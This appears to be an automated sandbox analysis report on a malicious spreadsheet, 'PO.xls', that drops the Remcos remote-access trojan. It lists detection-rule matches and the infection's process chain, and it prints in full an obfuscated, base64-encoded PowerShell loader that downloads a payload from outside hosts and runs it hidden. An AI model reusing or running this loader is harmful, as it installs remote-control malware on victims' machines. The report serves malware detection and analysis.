                    Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 4036, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: RegAsm.exe PID: 3044, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C899BC08.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winXLS@13/32@191/5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,16_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,16_2_0040F4AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,16_2_0041B539
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,16_2_0041AADB
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\62830000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-M3P7YT
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR86DB.tmpJump to behavior
                    Source: PO.xlsOLE indicator, Workbook stream: true
                    Source: 62830000.0.drOLE indicator, Workbook stream: true
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: PO.xlsReversingLabs: Detection: 18%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
